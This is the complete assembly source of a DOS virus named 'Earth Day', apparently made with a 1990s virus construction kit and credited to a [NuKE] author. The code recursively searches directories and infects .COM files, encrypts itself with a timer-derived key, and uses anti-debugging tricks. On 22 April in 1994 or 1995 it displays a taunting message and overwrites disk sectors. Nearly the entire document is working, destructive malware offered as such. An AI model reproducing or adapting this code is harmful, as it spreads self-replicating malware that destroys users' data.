; EARTHDAY.ASM -- Earth Day Virus
; Created with Nowhere Man's Virus Creation Laboratory v1.00
; Written by Nowhere Man
virus_type      equ     0		        ; Appending Virus
is_encrypted    equ     1			; We're encrypted
tsr_virus	equ	0			; We're not TSR
code		segment byte public
		assume	cs:code,ds:code,es:code,ss:code
		org	0100h
main		proc	near
		db	0E9h,00h,00h		; Near jump (for compatibility)
start:		call	find_offset		; Like a PUSH IP
find_offset:	pop	bp			; BP holds old IP
		sub	bp,offset find_offset	; Adjust for length of host
		call	encrypt_decrypt		; Decrypt the virus
start_of_code	label	near
		lea	si,[bp + buffer]	; SI points to original start
		mov	di,0100h		; Push 0100h on to stack for
		push	di			; return to main program
		movsw				; Copy the first two bytes
		movsb				; Copy the third byte
		mov	di,bp			; DI points to start of virus
		mov	bp,sp			; BP points to stack
		sub	sp,128			; Allocate 128 bytes on stack
		mov	ah,02Fh			; DOS get DTA function
		int	021h
		push	bx			; Save old DTA address on stack
		mov	ah,01Ah			; DOS set DTA function
		lea	dx,[bp - 128]		; DX points to buffer on stack
		int	021h
stop_tracing:	mov	cx,09EBh
		mov	ax,0FE05h		; Acutal move, plus a HaLT
		jmp	$-2
		add	ah,03Bh			; AH now equals 025h
		jmp	$-10			; Execute the HaLT
		lea	bx,[di + null_vector]	; BX points to new routine
		push	cs			; Transfer CS into ES
		pop	es			; using a PUSH/POP
		int	021h
		mov	al,1			; Disable interrupt 1, too
		int	021h
		jmp	short skip_null		; Hop over the loop
null_vector:	jmp	$			; An infinite loop
skip_null:	mov	byte ptr [di + lock_keys + 1],130  ; Prefetch unchanged
lock_keys:	mov	al,128			; Change here screws DEBUG
		out	021h,al			; If tracing then lock keyboard
		call	get_month
		cmp	ax,0004h		; Did the function return 4?
		jne	skip00			; If not equal, skip effect
		call	get_day
		cmp	ax,0016h		; Did the function return 22?
		jne	skip00			; If not equal, skip effect
		call	get_year
		cmp	ax,07C9h		; Did the function return 1993?
		jle	skip00			; If less that or equal, skip effect
		cmp	ax,07CCh		; Did the function return 1996?
		jge	skip00			; If greater than or equal, skip effect
		jmp	short strt00		; Success -- skip jump
skip00:		jmp	end00			; Skip the routine
strt00:		lea	si,[di + data00]	; SI points to data
		mov	ah,0Eh			; BIOS display char. function
display_loop:   lodsb				; Load the next char. into AL
		or	al,al			; Is the character a null?
		je	disp_strnend		; If it is, exit
		int	010h			; BIOS video interrupt
		jmp	short display_loop	; Do the next character
		mov	ax,0002h		; First argument is 2
		mov	cx,0100h		; Second argument is 256
		cli				; Disable interrupts (no Ctrl-C)
		cwd				; Clear DX (start with sector 0)
		int	026h			; DOS absolute write interrupt
		sti				; Restore interrupts
end00:		xor	ah,ah			; BIOS get time function
		int	01Ah
		xchg	dx,ax			; AX holds clock ticks
		mov	cx,0005h		; We'll divide by 5
		cwd				; Sign-extend AX into DX:AX
		div	cx			; Divide AX by CX
		or	dx,dx			; Is there a remaindier?
		jne	no_infection		; If there is then don't spread
		call	search_files		; Find and infect a file
com_end:	pop	dx			; DX holds original DTA address
		mov	ah,01Ah			; DOS set DTA function
		int	021h
		mov	sp,bp			; Deallocate local buffer
		xor	ax,ax			;
		mov	bx,ax			;
		mov	cx,ax			;
		mov	dx,ax			; Empty out the registers
		mov	si,ax			;
		mov	di,ax			;
		mov	bp,ax			;
		ret				; Return to original program
main		endp
		db	009h,0C0h,0EEh,0D9h,0ECh
search_files	proc	near
		push	bp			; Save BP
		mov	bp,sp			; BP points to local buffer
		sub	sp,64			; Allocate 64 bytes on stack
		mov	ah,047h			; DOS get current dir function
		xor	dl,dl			; DL holds drive # (current)
		lea	si,[bp - 64]		; SI points to 64-byte buffer
		int	021h
		mov	ah,03Bh			; DOS change directory function
		lea	dx,[di + root]		; DX points to root directory
		int	021h
		call	traverse		; Start the traversal
		mov	ah,03Bh			; DOS change directory function
		lea	dx,[bp - 64]		; DX points to old directory
		int	021h
		mov	sp,bp			; Restore old stack pointer
		pop	bp			; Restore BP
		ret				; Return to caller
root		db	"\",0			; Root directory
search_files	endp
traverse	proc	near
		push	bp			; Save BP
		mov	ah,02Fh			; DOS get DTA function
		int	021h
		push	bx			; Save old DTA address
		mov	bp,sp			; BP points to local buffer
		sub	sp,128			; Allocate 128 bytes on stack
		mov	ah,01Ah			; DOS set DTA function
		lea	dx,[bp - 128]		; DX points to buffer
		int	021h
		mov	ah,04Eh			; DOS find first function
		mov	cx,00010000b		; CX holds search attributes
		lea	dx,[di + all_files]	; DX points to "*.*"
		int	021h
		jc	leave_traverse		; Leave if no files present
check_dir:	cmp	byte ptr [bp - 107],16	; Is the file a directory?
		jne	another_dir		; If not, try again
		cmp	byte ptr [bp - 98],'.'	; Did we get a "." or ".."?
		je	another_dir		;If so, keep going
		mov	ah,03Bh			; DOS change directory function
		lea	dx,[bp - 98]		; DX points to new directory
		int	021h
		call	traverse		; Recursively call ourself
		pushf				; Save the flags
		mov	ah,03Bh			; DOS change directory function
		lea	dx,[di + up_dir]	; DX points to parent directory
		int	021h
		popf				; Restore the flags
		jnc	done_searching		; If we infected then exit
another_dir:	mov	ah,04Fh			; DOS find next function
		int	021h
		jnc	check_dir		; If found check the file
		lea	dx,[di + com_mask]	; DX points to "*.COM"
		call	find_files		; Try to infect a file
done_searching:	mov	sp,bp			; Restore old stack frame
		mov	ah,01Ah			; DOS set DTA function
		pop	dx			; Retrieve old DTA address
		int	021h
		pop	bp			; Restore BP
		ret				; Return to caller
up_dir		db	"..",0			; Parent directory name
all_files	db	"*.*",0			; Directories to search for
com_mask	db	"*.COM",0		; Mask for all .COM files
traverse	endp
		db	0E0h,049h,06Ch,01Bh,06Ch
find_files	proc	near
		push	bp			; Save BP
		mov	ah,02Fh			; DOS get DTA function
		int	021h
		push	bx			; Save old DTA address
		mov	bp,sp			; BP points to local buffer
		sub	sp,128			; Allocate 128 bytes on stack
		push	dx			; Save file mask
		mov	ah,01Ah			; DOS set DTA function
		lea	dx,[bp - 128]		; DX points to buffer
		int	021h
		mov	ah,04Eh			; DOS find first file function
		mov	cx,00100111b		; CX holds all file attributes
		pop	dx			; Restore file mask
find_a_file:	int	021h
		jc	done_finding		; Exit if no files found
		call	infect_file		; Infect the file!
		jnc	done_finding		; Exit if no error
		mov	ah,04Fh			; DOS find next file function
		jmp	short find_a_file	; Try finding another file
done_finding:	mov	sp,bp			; Restore old stack frame
		mov	ah,01Ah			; DOS set DTA function
		pop	dx			; Retrieve old DTA address
		int	021h
		pop	bp			; Restore BP
		ret				; Return to caller
find_files	endp
		db	00Ah,073h,01Fh,038h,054h
infect_file	proc	near
		mov	ah,02Fh			; DOS get DTA address function
		int	021h
		mov	si,bx			; SI points to the DTA
		mov	byte ptr [di + set_carry],0  ; Assume we'll fail
		cmp	word ptr [si + 01Ah],(65279 - (finish - start))
		jbe	size_ok			; If it's small enough continue
		jmp	infection_done		; Otherwise exit
size_ok:	mov	ax,03D00h		; DOS open file function, r/o
		lea	dx,[si + 01Eh]		; DX points to file name
		int	021h
		xchg	bx,ax			; BX holds file handle
		mov	ah,03Fh			; DOS read from file function
		mov	cx,3			; CX holds bytes to read (3)
		lea	dx,[di + buffer]	; DX points to buffer
		int	021h
		mov	ax,04202h		; DOS file seek function, EOF
		cwd				; Zero DX _ Zero bytes from end
		mov	cx,dx			; Zero CX /
		int	021h
		xchg	dx,ax			; Faster than a PUSH AX
		mov	ah,03Eh			; DOS close file function
		int	021h
		xchg	dx,ax			; Faster than a POP AX
		sub	ax,finish - start + 3	; Adjust AX for a valid jump
		cmp	word ptr [di + buffer + 1],ax  ; Is there a JMP yet?
		je	infection_done		; If equal then exit
		mov	byte ptr [di + set_carry],1  ; Success -- the file is OK
		add	ax,finish - start	; Re-adjust to make the jump
		mov	word ptr [di + new_jump + 1],ax  ; Construct jump
          	mov	ax,04301h		; DOS set file attrib. function
		xor	cx,cx			; Clear all attributes
		lea	dx,[si + 01Eh]		; DX points to victim's name
		int	021h
		mov	ax,03D02h		; DOS open file function, r/w
		int	021h
		xchg	bx,ax			; BX holds file handle
		mov	ah,040h			; DOS write to file function
		mov	cx,3			; CX holds bytes to write (3)
		lea	dx,[di + new_jump]	; DX points to the jump we made
		int	021h
		mov	ax,04202h		; DOS file seek function, EOF
		cwd				; Zero DX _ Zero bytes from end
		mov	cx,dx			; Zero CX /
		int	021h
		push	si			; Save SI through call
		call	encrypt_code		; Write an encrypted copy
		pop	si			; Restore SI
		mov	ax,05701h		; DOS set file time function
		mov	cx,[si + 016h]		; CX holds old file time
		mov	dx,[si + 018h]		; DX holds old file date
		int	021h
		mov	ah,03Eh			; DOS close file function
		int	021h
		mov	ax,04301h		; DOS set file attrib. function
		xor	ch,ch			; Clear CH for file attribute
		mov	cl,[si + 015h]		; CX holds file's old attributes
		lea	dx,[si + 01Eh]		; DX points to victim's name
		int	021h
infection_done:	cmp	byte ptr [di + set_carry],1  ; Set carry flag if failed
		ret				; Return to caller
set_carry	db	?			; Set-carry-on-exit flag
buffer		db	090h,0CDh,020h		; Buffer to hold old three bytes
new_jump	db	0E9h,?,?		; New jump to virus
infect_file	endp
		db	0D9h,095h,0B5h,0D7h,0D0h
get_day         proc	near
		mov	ah,02Ah			; DOS get date function
		int	021h
		mov	al,dl			; Copy day into AL
		cbw				; Sign-extend AL into AX
		ret				; Return to caller
get_day         endp
		db	0F6h,028h,099h,0E1h,06Dh
get_month       proc	near
		mov	ah,02Ah			; DOS get date function
		int	021h
		mov	al,dh			; Copy month into AL
		cbw				; Sign-extend AL into AX
		ret				; Return to caller
get_month       endp
		db	071h,021h,0B4h,033h,071h
get_year        proc	near
		mov	ah,02Ah			; DOS get date function
		int	021h
		xchg	cx,ax			; Transfer the year into AX
		ret				; Return to caller
get_year        endp
data00		db      "Happy Earth Day!!!",13,10,13,10
		db      "In the spirit of Earth Day,
                db      "this VIRUS has recycled your hard disk.",13,10,0
vcl_marker	db	"[VCL]",0		; VCL creation marker
note		db	"[Earth Day]",0
		db	"Nowhere Man, [NuKE] '92",0
encrypt_code	proc	near
		push	bp			; Save BP
		mov	bp,di			; Use BP as pointer to code
		lea	si,[bp + encrypt_decrypt]; SI points to cipher routine
		xor	ah,ah			; BIOS get time function
		int	01Ah
		mov	word ptr [si + 9],dx	; Low word of timer is new key
		xor	byte ptr [si + 1],8	;
		xor	byte ptr [si + 8],1	; Change all SIs to DIs
		xor	word ptr [si + 11],0101h; (and vice-versa)
		lea	di,[bp + finish]	; Copy routine into heap
		mov	cx,finish - encrypt_decrypt - 1  ; All but final RET
		push	si			; Save SI for later
		push	cx			; Save CX for later
	        rep	movsb			; Copy the bytes
		lea	si,[bp + write_stuff]	; SI points to write stuff
		mov	cx,5			; CX holds length of write
	        rep	movsb			; Copy the bytes
		pop	cx			; Restore CX
		pop	si			; Restore SI
		inc	cx			; Copy the RET also this time
	        rep	movsb			; Copy the routine again
		mov	ah,040h			; DOS write to file function
		lea	dx,[bp + start]		; DX points to virus
		lea	si,[bp + finish]	; SI points to routine
		call	si			; Encrypt/write/decrypt
		mov	di,bp			; DI points to virus again
		pop	bp			; Restore BP
		ret				; Return to caller
write_stuff:	mov	cx,finish - start	; Length of code
		int	021h
encrypt_code	endp
end_of_code	label	near
encrypt_decrypt	proc	near
		lea	si,[bp + start_of_code] ; SI points to code to decrypt
		mov	cx,(end_of_code - start_of_code) / 2 ; CX holds length
xor_loop:	db	081h,034h,00h,00h	; XOR a word by the key
		inc	si			; Do the next word
		inc	si			;
		loop	xor_loop		; Loop until we're through
		ret				; Return to caller
encrypt_decrypt	endp
finish		label	near
code		ends
		end	main